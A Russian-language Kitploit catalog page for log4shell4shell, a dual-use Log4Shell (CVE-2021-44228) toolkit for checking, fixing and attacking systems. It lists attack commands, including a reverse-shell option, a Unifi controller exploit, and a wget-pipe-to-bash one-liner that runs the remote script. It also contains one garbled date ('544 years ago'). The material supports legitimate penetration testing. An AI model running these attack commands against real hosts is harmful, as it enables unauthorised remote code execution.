Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4shell4shell — Log4shell - Multi-Toolkit. Найдите, исправьте и проверьте возможные уязвимости CVE-2021-44228 - предоставляет полную среду тестирования/атаки LOG4SHELL в оболочке. | Kitploit
Инструменты/GitHubGitHub/suuhm/log4shell4shell
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubsuuhm/log4shell4shell

log4shell4shell

Log4shell - Multi-Toolkit. Найдите, исправьте и проверьте возможные уязвимости CVE-2021-44228 - предоставляет полную среду тестирования/атаки LOG4SHELL в оболочке.

Репозиторий
544 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

log4shell4shell

Log4j — мультиинструмент. Найдите и устраните возможные CVE-2021-44228 уязвимости — предоставляет полную среду тестирования/атаки LOG4SHELL

Thumb

Возможности

  • Проверка вашей системы Linux/Mac/BSD и Windows на уязвимости CVE-2021-44228
  • Исправление вашей системы путём удаления java-класса log4j / или установки некоторых переменных окружения
  • Proof of Concept: вы можете запустить фиктивный сервер Spring Boot для самостоятельного тестирования эксплойта (https://github.com/christophetd/log4shell-vulnerable-app)
  • Вы можете запустить атаку на нужный IP-порт и включить Base64-команду / или простую Reverse Shell
  • Полное сканирование IP-диапазона с помощью https://github.com/fullhunt/log4j-scan

Как запустить на Linux/Mac/BSD:

Требования:

  • https://docs.docker.com/get-docker/
  • Debian / Ubuntu: apt update ; apt install default-jre screen python3-pip bash curl
  • OpenSuse: zypper ref ; zypper in default-jre screen python3-pip bash curl
  • Redhead-Linux / CentOS: yum clean; yum install default-jre screen python3-pip bash curl
  • BSD pkg: pkg install default-jre screen python3-pip curl
  • Mac OS (Brew): /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip
  • Быстрая проверка вашей системы с помощью этой однострочной команды:

    root@kitploit:~
    wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system
    

    Дополнительные параметры

    Запуск тестовой атаки на IP: 10.4.4.20, порт 8080, страницу входа, а также Reverse Proxy Shell:

    root@kitploit:~
    git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
    mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
    ./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e
    

    Выполните screen -r l4s4s-ldap-srv и/или screen -r l4s4s-nc-rsh, чтобы просмотреть информацию об атаке в оболочке Exploit-Server:

    Запуск полного сканирования IP: 10.4.4.20, порт 8080, а также попытка всех тестов:

    root@kitploit:~
    ./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"
    

    Запуск Proof of Concept на сервере Tomcat Springboot:

    root@kitploit:~
    ./l4s4s.sh --run-dummy-server && \
    ./l4s4s.sh --run-attack http://127.0.0.1:4280 -e
    

    Запуск эксплойта/проверки Unifi-Controller (на 10.4.4.20:8443):

    root@kitploit:~
    ./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post
    

    Все доступные параметры

    root@kitploit:~
    _|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
    _|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
    _|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
    _|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
    _|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                              _|
                          _|_|
    
    
     > Запуск Logshell Framework & Check-Toolkit в оболочке v0.1a (C) 2021 suuhm
    
    Неверный ввод! Пожалуйста, выберите один из следующих параметров:
    
    Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>
    
                            --get-powershell-finder
                            --check-system
                            --fix-log4j
                            --run-dummy-server <JNDIExploit.*.zip>
                            --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                            --python-scan <command>
    
    

    Как обновить версию python в Linux и/или macOS:

    Просто запустите мой вспомогательный скрипт (--list-versions): ./python-upgrader.sh

    Как запустить на Windows x86 / x64:

    Просто запустите в Powershell (от имени администратора): .\set_windows_fix.ps1

    Этот скрипт — альфа-версия! Поэтому, пожалуйста, сообщите мне, если у вас возникнут проблемы

    Правовое предупреждение

    Проект log4shell4shell создан только для образовательных и этических целей тестирования. Использование log4j-scan для атак на цели без предварительного взаимного согласия незаконно. Ответственность за соблюдение всех применимых местных, государственных и федеральных законов лежит на конечном пользователе. Разработчики не несут ответственности и не отвечают за любое неправильное использование или ущерб, причинённый этой программой.

    Скачать инструмент